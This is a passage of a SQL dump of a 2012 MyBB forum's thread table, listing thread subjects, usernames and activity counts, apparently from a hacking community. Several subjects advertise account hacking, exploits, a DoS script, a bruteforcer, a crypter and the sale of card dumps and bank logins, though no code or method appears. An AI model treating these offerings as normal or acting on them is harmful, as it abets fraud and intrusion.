`attachmentcount`, `deletetime`) VALUES ('267', '3', '[Small Announcement] Userbars/Images Updated', '0', '0', '0', '82', 'iTzIpod', '1346113934', '1188', '1346252213', 'iTzIpod', '82', '53', '11', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('268', '49', '[Suggestion] Forum News Section', '0', '0', '0', '82', 'iTzIpod', '1346114870', '1189', '1347477957', 'iTzIpod', '82', '18', '5', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('269', '3', 'Group Image not working', '0', '0', '0', '55', 'Baws', '1346127095', '1212', '1346164105', 't3h jok3r', '1', '16', '4', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('271', '53', 'Minecraft/Rsps coding', '0', '0', '0', '67', 'HoverCatz', '1346143024', '1230', '1346255864', 'iTzIpod', '82', '16', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('270', '7', 'Hi everyone', '0', '0', '0', '61', 'NXK', '1346136280', '1228', '1346383217', 'NXK', '61', '18', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('272', '4', 'Hello, I\'m Dreamer', '0', '0', '0', '138', 'Dreamer', '1346169102', '1243', '1346473640', 'Apathy', '2', '16', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('273', '59', '????Free Spreading Complete Ebook????', '0', '0', '0', '138', 'Dreamer', '1346171506', '1249', '1349619274', '??zg???g????61', '100', '21', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('277', '11', 'Any phreaking tutorials?', '0', '0', '0', '141', 'Bane™', '1346221819', '1304', '1346263823', 'Bane™', '141', '18', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('276', '4', 'Greetings.', '0', '0', '0', '141', 'Bane™', '1346197263', '1280', '1346254447', 't3h jok3r', '1', '13', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('274', '42', 'Another death in the family for Sylvester Stallone', '0', '0', '0', '1', 't3h jok3r', '1346189604', '1274', '1347328804', 'Timmy', '5', '10', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('275', '12', '[???]Hack Tons of YouTube Accounts. No Keylogging etc.[???]', '0', '0', '0', '5', 'Timmy', '1346189787', '1275', '1346210074', 'iTzIpod', '82', '23', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('278', '7', 'My first mybb theme [WIP]', '0', '0', '0', '54', 'Sin Cara', '1346252354', '1308', '1346374143', 't3h jok3r', '1', '19', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('279', '3', '[Bug] Awards are gone', '0', '0', '0', '82', 'iTzIpod', '1346256050', '1322', '1346270963', 't3h jok3r', '1', '15', '3', '0', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('293', '16', 'How to SE fererro', '0', '0', '0', '154', 'fap', '1346370306', '1363', '1346814019', '??????Z', '112', '15', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('281', '84', 'Upload N Sell Exploit', '0', '0', '0', '84', 'Thunder™', '1346261031', '1335', '1351463634', 'Timmy', '5', '77', '10', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('282', '55', '[Request] Youtube Accounts', '0', '0', '0', '84', 'Thunder™', '1346261212', '1336', '1346287917', 'iTzIpod', '82', '8', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('283', '14', 'Proxy List August 2012[Working]', '0', '0', '0', '84', 'Thunder™', '1346261697', '1337', '1346417623', 'MinecraftGeek', '150', '9', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('284', '7', 'Typing Speed Test', '0', '0', '0', '84', 'Thunder™', '1346261768', '1338', '1346644149', 'Timmy', '5', '19', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('285', '12', 'How to track location of person on any chat box', '0', '0', '0', '84', 'Thunder™', '1346261829', '1339', '1348795909', 'Triple H', '4', '15', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('286', '3', '[Announcement] Awards and IP Log History Features', '0', '0', '0', '1', 't3h jok3r', '1346270947', '1343', '1346640084', 't3h jok3r', '1', '27', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('287', '41', 'steam account', '0', '0', '0', '84', 'Thunder™', '1346300993', '1352', '1346300993', 'Thunder™', '84', '12', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('288', '19', '[Junk]Joker delete this', '0', '0', '0', '67', 'HoverCatz', '1346331326', '1353', '1346340893', 'JakeUS', '20', '12', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('289', '15', 'UploadNSell Exploit Program', '0', '0', '0', '67', 'HoverCatz', '1346331650', '1354', '1352011827', 't3h jok3r', '1', '96', '13', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('290', '19', '[Junk][Junk]Our service is specialized on USA and CANADA dumps, but EUROPE/ASIA/WORLD dumps also', '0', '0', '0', '6', 'xlesnyx12', '1346348794', '1358', '1346348794', 'xlesnyx12', '6', '6', '0', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('291', '19', '[Junk]BANK LOGINS FOR SALE UK BANK LOGIN IN STOCK: Abbey Fresh // Alliance & Leicester //', '0', '0', '0', '6', 'xlesnyx12', '1346349114', '1359', '1346349114', 'xlesnyx12', '6', '11', '0', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('294', '16', 'How to se pringles,monster,hersheys,duracell and stride', '0', '0', '0', '154', 'fap', '1346370620', '1364', '1347013247', '??????Z', '112', '19', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('295', '59', '[ebook] Crypter Blueprint', '0', '0', '0', '5', 'Timmy', '1346373955', '1368', '1346373955', 'Timmy', '5', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('296', '55', '[Req] 50 Cents paypal', '0', '0', '0', '61', 'NXK', '1346383149', '1373', '1346384327', 'iTzIpod', '82', '25', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('297', '7', 'My new Work', '0', '0', '0', '54', 'Sin Cara', '1346388713', '1377', '1346458522', 'iTzIpod', '82', '19', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('298', '9', '???[EASY] LH\'s #1 WAY TO EARN MONEY GUARANTEED [EASY]???', '0', '0', '0', '159', 'Victori0us', '1346419973', '1383', '1347329518', 'Romdu62', '7', '27', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('304', '3', 'Explainations on recent events.', '0', '0', '0', '2', 'Apathy', '1346470631', '1414', '1346642327', 'Apathy', '2', '22', '5', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('299', '3', 'Apathy Promoted!!!', '0', '0', '0', '1', 't3h jok3r', '1346458710', '1397', '1346620397', 'iTzIpod', '82', '24', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('300', '4', 'Whats up', '0', '0', '0', '162', 'Dingus', '1346458881', '1399', '1346458923', 'iTzIpod', '82', '7', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('301', '25', 'Is keyscrambler good?', '0', '0', '0', '4', 'Triple H', '1346460501', '1404', '1346971772', 'p420', '9', '4', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('302', '53', 'Java DoS Script', '0', '0', '0', '4', 'Triple H', '1346460658', '1405', '1347649945', 'sirchamp', '53', '28', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('303', '4', 'Heyo', '0', '0', '0', '156', 'Omniscent', '1346465732', '1408', '1346642596', 't3h jok3r', '1', '17', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('305', '84', 'Themejunkies.net theme rip', '0', '0', '0', '2', 'Apathy', '1346471373', '1415', '1351897285', 'VirtualLegend', '228', '33', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('306', '8', 'Annoying/Catchy Song? [KPOP]', '0', '0', '0', '82', 'iTzIpod', '1346594393', '1433', '1346620515', 'iTzIpod', '82', '12', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('308', '3', 'Marketplace Removed', '0', '0', '0', '1', 't3h jok3r', '1346642463', '1453', '1346643789', 'Timmy', '5', '13', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('307', '3', '[Announcement] T3h Jok3r is back!!!', '0', '0', '0', '1', 't3h jok3r', '1346640273', '1445', '1346688837', 'NXK', '61', '36', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('317', '61', 'Unique\'s Purpose', '0', '0', '0', '82', 'iTzIpod', '1346692068', '1489', '1347934563', 'iTzIpod', '82', '44', '10', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('309', '61', 'Quick Announcement', '0', '0', '0', '1', 't3h jok3r', '1346642692', '1456', '1347413977', 'iTzIpod', '82', '16', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('310', '13', '[ HOT ] How to Hack Your School Grading System [Change]', '0', '0', '0', '5', 'Timmy', '1346643345', '1458', '1351035469', 'XxTREYZxX', '257', '48', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('311', '15', 'UploadNSell Scraper', '0', '0', '0', '5', 'Timmy', '1346643720', '1459', '1347080107', 'Timmy', '5', '23', '3', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('312', '15', 'RKTs Admin Login Bruteforcer v1.0', '0', '0', '0', '8', 'spacefish36', '1346644365', '1467', '1346644365', 'spacefish36', '8', '16', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('314', '2', 'Testing Staff Message MyCode', '0', '0', '0', '1', 't3h jok3r', '1346645469', '1474', '1346645469', 't3h jok3r', '1', '7', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('313', '52', '[VB.net Source] PayPal Cash System', '0', '0', '0', '1', 't3h jok3r', '1346644969', '1472', '1346716668', 't3h jok3r', '1', '25', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('315', '61', 'Welcome to Unique\'s HQ', '0', '0', '0', '82', 'iTzIpod', '1346646375', '1476', '1352588387', 'R?????zo?', '62', '59', '15', '', '1', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('316', '4', 'Hello everyone.', '0', '0', '0', '166', '2112', '1346648382', '1480', '1346718817', 't3h jok3r', '1', '22', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('327', '5', 'Staff Notice in threads', '0', '0', '0', '1', 't3h jok3r', '1346718727', '1532', '1348973915', '??????????¢™', '3', '17', '3', '', '1', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('318', '9', 'Want to Earn Money by doing Nothing ?', '0', '0', '0', '84', 'Thunder™', '1346695796', '1493', '1347493581', 'iTzIpod', '82', '43', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('319', '3', '[Bug] Gray/Grey Stars are bugged', '0', '0', '0', '82', 'iTzIpod', '1346697522', '1497', '1346700417', 't3h jok3r', '1', '17', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('320', '34', 'Fashion Dream Signature Tutorial', '0', '0', '0', '82', 'iTzIpod', '1346702440', '1501', '1346708894', 'Apathy', '2', '9', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('321', '34', 'Full Signature Tutorial', '0', '0', '0', '82', 'iTzIpod', '1346702634', '1502', '1350599318', 'iTzIpod', '82', '26', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('322', '34', 'Signature Tutorial', '0', '0', '0', '82', 'iTzIpod', '1346702729', '1503', '1346718534', 'iTzIpod', '82', '13', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('323', '7', 'If I go inactive', '0', '0', '0', '82', 'iTzIpod', '1346704261', '1505', '1346961745', 'iTzIpod', '82', '66', '18', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, 